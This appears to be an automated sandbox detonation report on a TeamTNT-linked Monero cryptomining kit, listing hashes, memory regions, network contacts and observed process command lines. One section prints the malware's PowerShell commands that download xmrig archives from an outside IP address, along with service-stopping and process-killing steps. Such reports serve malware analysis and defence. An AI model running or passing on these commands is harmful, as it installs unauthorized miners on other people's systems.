memory/3208-186-0x000001D870293000-0x000001D870295000-memory.dmp
memory/3208-184-0x000001D870290000-0x000001D870292000-memory.dmp
memory/3208-187-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/1436-188-0x0000000000000000-mapping.dmp
memory/1436-189-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-190-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-191-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-192-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-193-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fbc13122e84a66242a4f0fabcd5cf9d5 |
| SHA1 | 498523ee15b697808a1d425d0f1c0e6b1d2cc22b |
| SHA256 | 46bc755334c54a648e0363cd01ced9fe3c68793e6845ae4bf7880c96e2c4f727 |
| SHA512 | 4fe9dffa6b4cf4ffcc86e737d8d6f8d585b48bcaeb03fb0daf5b9234447054009dcdd236ae44afa6604689501e3666da35e8f267ec3f6a85eef30b4ad524684b |
memory/1436-196-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-198-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-197-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-199-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-201-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/3208-204-0x000001D870296000-0x000001D870298000-memory.dmp
memory/1436-206-0x00000130311B0000-0x00000130311B2000-memory.dmp
memory/1436-207-0x00000130311B3000-0x00000130311B5000-memory.dmp
C:\Users\Admin\moneroocean\config.json
| MD5 | bfa626e053028f9adbfaceb5d56086c3 |
| SHA1 | acf9d3be3211c8f96b823517ea83888982d498d3 |
| SHA256 | c17e1a22b7bc00e591aede9d101b843ff2e47d5b582bb0628406bbd53b7dac78 |
| SHA512 | 692115d964b98f380c0f45a9e25dc3d22bc53447c1aa76732103e7ac1807459c45348d873dcb0eeb92ca38f9a954f27078a8f4a3508ca5b4b3809a92f02765d0 |
memory/2780-214-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
memory/1436-218-0x00000130311B6000-0x00000130311B8000-memory.dmp
memory/3064-219-0x0000000000000000-mapping.dmp
memory/3500-220-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a23c5e5e705de0f30711748e5b021e3a |
| SHA1 | 146daa5ef1d5bfc0ebfdcf4537221003a832ddec |
| SHA256 | 6bdddbb0686a9a4cc948e1290c586eb9ca08d1598f954520281eea544ec20125 |
| SHA512 | 356545f153b2f828a046f499d2dd9809f2e1528e503c708ae4ade623b80c4f3a188a777e1019b6f591d4977330fe63d8d733eae78e896d0760593d6192880d9f |
memory/3164-233-0x0000000000000000-mapping.dmp
memory/3040-235-0x0000000000000000-mapping.dmp
memory/3500-236-0x0000020BC4250000-0x0000020BC4252000-memory.dmp
memory/3500-238-0x0000020BC4253000-0x0000020BC4255000-memory.dmp
memory/3500-240-0x0000020BC4256000-0x0000020BC4258000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cea649ddfaf4c9d0fc78102f3208ff5a |
| SHA1 | 6f87f94f33d44019a882f5caf6a69d1e28e9fc03 |
| SHA256 | 7f85db2ec7f2aa30ba605ee3178e24e4c603174671b909bc4ef2cfca22af3328 |
| SHA512 | 6b4eb7cb9ec616d21d5656639786cf3d67785c24b02725c8c8b6e11a032d5a38e5ca01e9ed06bd83a6289937f1cee9228019a513b205daf4fc168c6bb7667dd3 |
C:\Users\Admin\moneroocean\config.json
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3924-261-0x0000000000000000-mapping.dmp
memory/3040-262-0x0000026A70F60000-0x0000026A70F62000-memory.dmp
memory/3040-264-0x0000026A70F63000-0x0000026A70F65000-memory.dmp
memory/3040-266-0x0000026A70F66000-0x0000026A70F68000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7aae732886160c0ea69ed4b1f7d82231 |
| SHA1 | 9c289c7bf92d46ff6393da7463d15f02de2415b6 |
| SHA256 | 67cc09d839ff76aae15e2754f40dc0a2170812877d2e138b40c9af92f2db46f8 |
| SHA512 | 8544786850eaf1e390599ebaff23208d6df5e4cd2e32290e508b66cbfea9eb2f6dffa6a049a3e0666d47a17801484bc58a57eba4002e1fd2b0bb6c997f0ea75a |
C:\Users\Admin\moneroocean\config.json
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1012-288-0x0000000000000000-mapping.dmp
memory/3924-289-0x00000296F5120000-0x00000296F5122000-memory.dmp
memory/3924-291-0x00000296F5123000-0x00000296F5125000-memory.dmp
memory/3924-293-0x00000296F5126000-0x00000296F5128000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fab18070fd50d74b120dd23c7380730d |
| SHA1 | 1cb5b806851000947fd827b5a1ef2b5f66fc4b6d |
| SHA256 | d072fb7c437b427761a63930fa72788e33e28f02bd69637d724036594f05782e |
| SHA512 | a7795a2efc157457d239c775d73a7d1750433029d37f73d07468f341af8eab72f105e1ec8b5e0131c51f905d677fa5a17840f57d523e2f09b752dcdb0c53a719 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 115d22c264f7912e7d02307386db8c53 |
| SHA1 | fe96e575df30c6c3b4f1c3a331d6641f7061726e |
| SHA256 | 38b5c830e728ac133ac5f8153f48f0e90c74dfdbde73426de2331dde69300c9a |
| SHA512 | 0390fd713b7a413eff753f9ab5e3779cf3c0a59b0dbd701e58bae5be222c3ae846dc0605c4802a1851e1e3f371c0baf28560b5bbf98a4131857ee1e0fb864bd8 |
memory/1012-314-0x000002274F1C0000-0x000002274F1C2000-memory.dmp
memory/1012-315-0x000002274F1C3000-0x000002274F1C5000-memory.dmp
memory/1012-316-0x000002274F1C6000-0x000002274F1C8000-memory.dmp
memory/1600-317-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0f07fdc2bb6d46548cc4fa428192640d |
| SHA1 | 968eb2eb678e3662dff687b18c3adba9cbfbfc28 |
| SHA256 | b9e4393b418339bee03585c1138cac1807b56ec7f1add46db438d90f8f210230 |
| SHA512 | 971a83e65520e67b0b6cc2d580e759e62c385eae9b9784ef35a888a9e46264fa1c6b1675f9413d79e0d0ecde4727ff22fc54c5a5f92d8873a12bbf32c23d940d |
C:\Users\Admin\moneroocean\config.json
| MD5 | c35b704c05e2018ce71f35b4be6d687b |
| SHA1 | 7771d19d56d23d3d6f38df5c33a2f162c2b07493 |
| SHA256 | 53b163495576feeb58a418e067016223e9bcfaec0e3e2b0a7d6636c5c23b51d7 |
| SHA512 | 7ecfb37d3bf84959b923f9123053456db74016afc36ce29a6a55b5a6e6fe1d6abeff71724d61b1a499f97842fd711c6e2eaa3e7b885541fd3233aff2d2a24191 |
memory/1200-340-0x0000000000000000-mapping.dmp
memory/1600-341-0x000001691A610000-0x000001691A612000-memory.dmp
memory/1600-343-0x000001691A613000-0x000001691A615000-memory.dmp
memory/1600-345-0x000001691A616000-0x000001691A618000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c98fef9a6f6107dc9314bb5d72716701 |
| SHA1 | 8c2e869aa1b421c639c3b13e34da61b7eecdd897 |
| SHA256 | 17e0f565f69c35453e8a45e4eaae8ea0f16f33839430f85aca5be9512fb12388 |
| SHA512 | ee5321f06e34022d3d66c954c46c7bef13788fe4dce4fab029579eda74a8db9777552b274abed3f3a4dab20e1dc2243bb8cb51c3af3d6c320f614ffbc3e4b993 |
C:\Users\Admin\moneroocean\config.json
| MD5 | bc60290fa5050425ae4a655f493802aa |
| SHA1 | 42df7d9c1e95a7e86c4652b7688d5ea5f03e2c47 |
| SHA256 | 6d2d16f7f250d2db6686c1db275145944cfefef2bdee67bb263f815e10ca3409 |
| SHA512 | 6eda5175e9dc409ee2ae09a5050d08cb910395ecbb81262fdfcc42adcdb078febabf40b4dab679d003aaf625f1645f616c56e4926d6ff331f797f5c368bab5f7 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 05193fd0a7804c0389d4043816400804 |
| SHA1 | 9dfab5b729c059a690169de942919137643162ff |
| SHA256 | 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52 |
| SHA512 | cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997 |
memory/1424-367-0x0000000000000000-mapping.dmp
memory/1200-374-0x000001D3C5240000-0x000001D3C5242000-memory.dmp
memory/1200-375-0x000001D3C5243000-0x000001D3C5245000-memory.dmp
memory/1200-376-0x000001D3C5246000-0x000001D3C5248000-memory.dmp
memory/1424-377-0x000002717F050000-0x000002717F052000-memory.dmp
memory/1424-378-0x000002717F053000-0x000002717F055000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a83091216bc095616faaab798d468f77 |
| SHA1 | f6d1077e144e63da993aa76bbb7ba39c21c89a15 |
| SHA256 | f419c7896156c00eba685f53337be6a97c9c24d7a0de3d359302f75d4651ccde |
| SHA512 | 0488ed46d7276a89bd177c831c5ae63f57983ec7819042c91ba7a328d3f55aea93510a5fa91b1e200e251b6e9bd5d644a4c15faaf9bd89e2f93a29d70c336701 |
C:\Users\Admin\moneroocean\config_background.json
| MD5 | 8b89a341da7415528c151ae4ab3d851c |
| SHA1 | 2b28ff8a983351ab6c73c61bb6e96135fb9368d2 |
| SHA256 | c5cbb3a890dd0ac355a4b2928d7dfc0448b53800682401457b1144b77d5339f0 |
| SHA512 | 1319cd72fbc51c80a5df03ed7f67f737b1acf59eaae195cde72e5d7d33f93c044c65800467e8e10021ab1881df0e22d6d2ca9661fa51f536d09f8f943d6c96e5 |
memory/4016-395-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e53cd020c70375d710ffbf0044fa2067 |
| SHA1 | 778d68ffb59c06ddeb792b45de3e46762665e136 |
| SHA256 | 6f3b6badefd83943a29aadee6281b94771dd3c71e7884f71fafceba4843c0fd0 |
| SHA512 | f272ecd68a6417a22df2fd1c96a5a6a62ae96ae2a45e5bbe0ab890573c7b50bc699b2907a6d8a1ec2c012a793805b4beeb72a93865fb146f32948e5da49cbb1e |
memory/1424-407-0x000002717F056000-0x000002717F058000-memory.dmp
memory/4016-409-0x0000020744780000-0x0000020744782000-memory.dmp
memory/4016-410-0x0000020744783000-0x0000020744785000-memory.dmp
memory/1272-419-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 450adf71e232244110fe8c26e0e58dc6 |
| SHA1 | b668392ed522f7486c91b1c1ad02c35f357dda58 |
| SHA256 | 82447cb406c40e61e2ba971005d5c95836e668bd3bb774ba6f3fc217037e53e3 |
| SHA512 | 2775b438a597684349e09d1abc7f0131491f486b0ec6b7ce5dfd8051672f87a280f12d92b561b84d9dedf14618eedf07febd67123477759ee7a12f024b88c0a8 |
memory/1272-428-0x0000025A75320000-0x0000025A75322000-memory.dmp
memory/1272-429-0x0000025A75323000-0x0000025A75325000-memory.dmp
memory/4016-426-0x0000020744786000-0x0000020744788000-memory.dmp
C:\Users\Admin\nssm.zip
| MD5 | 7ad31e7d91cc3e805dbc8f0615f713c1 |
| SHA1 | 9f3801749a0a68ca733f5250a994dea23271d5c3 |
| SHA256 | 5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201 |
| SHA512 | d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260 |
memory/2936-455-0x0000000000000000-mapping.dmp
memory/2968-456-0x0000000000000000-mapping.dmp
memory/1532-457-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/2884-460-0x0000000000000000-mapping.dmp
memory/1272-462-0x0000025A75326000-0x0000025A75328000-memory.dmp
memory/712-463-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/3380-465-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/736-467-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/1512-469-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/2576-472-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
memory/2576-475-0x00000000001A0000-0x00000000001A4000-memory.dmp
memory/2436-476-0x0000000000000000-mapping.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
120s
Max time network
150s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 372 wrote to memory of 532 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
| PID 372 wrote to memory of 532 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
| PID 372 wrote to memory of 532 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
xmrig.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 199.247.27.41:3333 | donate.v2.xmrig.com | tcp |
Files
memory/532-55-0x0000000000000000-mapping.dmp
memory/532-56-0x0000000000400000-0x0000000000420000-memory.dmp
memory/532-58-0x00000000004F0000-0x0000000000510000-memory.dmp
memory/532-57-0x0000000000450000-0x0000000000470000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
121s
Max time network
158s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/4012-116-0x0000000000170000-0x0000000000190000-memory.dmp
memory/4012-117-0x00000000001B0000-0x00000000001B4000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20210920
Max time kernel
122s
Max time network
143s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\nssm.exe"
Network
Files
Analysis: behavioral32
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win7-en-20211014
Max time kernel
0s
Max time network
2s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Stops running service(s)
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\where.exe
where sc
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
Network
Files
memory/704-55-0x0000000000000000-mapping.dmp
memory/1500-56-0x0000000000000000-mapping.dmp
memory/1640-57-0x0000000000000000-mapping.dmp
memory/856-58-0x0000000000000000-mapping.dmp
memory/636-59-0x0000000000000000-mapping.dmp
memory/1004-60-0x0000000000000000-mapping.dmp
memory/880-61-0x0000000000000000-mapping.dmp
memory/1368-62-0x0000000000000000-mapping.dmp
memory/740-63-0x0000000000000000-mapping.dmp
memory/1776-64-0x0000000000000000-mapping.dmp
memory/1616-65-0x0000000000000000-mapping.dmp
memory/836-66-0x0000000000000000-mapping.dmp
memory/1564-67-0x0000000000000000-mapping.dmp
memory/1564-68-0x000007FEFB561000-0x000007FEFB563000-memory.dmp
memory/1564-69-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp
memory/1564-70-0x00000000024F0000-0x00000000024F2000-memory.dmp
memory/1564-71-0x00000000024F2000-0x00000000024F4000-memory.dmp
memory/1564-72-0x00000000024F4000-0x00000000024F7000-memory.dmp
memory/2044-73-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 0ef13bd9283ba54cbc47d9baf4601d6d |
| SHA1 | ede1ee9091274f021c8725fbbc376c6d532d6aca |
| SHA256 | 8e2dfa485ac3c31e0c7b3c5254d38376a6e8b8d3ad3f8fa9aad9de9095472929 |
| SHA512 | 42b0b2386012b29f13b7466c1e6289784f6031d251d048eabb4f84a1dee5c0f917ca452db94c51815100a349bf085ecdc379d0314576631409f31550cb141f27 |
memory/2044-78-0x00000000020D0000-0x00000000020D2000-memory.dmp
memory/2044-76-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp
memory/1564-77-0x00000000024FB000-0x000000000251A000-memory.dmp
memory/2044-80-0x00000000020D4000-0x00000000020D7000-memory.dmp
memory/2044-79-0x00000000020D2000-0x00000000020D4000-memory.dmp
memory/2044-81-0x00000000020DB000-0x00000000020FA000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
121s
Max time network
160s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20210920
Max time kernel
122s
Max time network
154s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3044 wrote to memory of 4336 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
| PID 3044 wrote to memory of 4336 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
xmrig.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 199.247.27.41:3333 | donate.v2.xmrig.com | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/4336-115-0x0000000000000000-mapping.dmp
memory/4336-116-0x000001BE63E60000-0x000001BE63E80000-memory.dmp
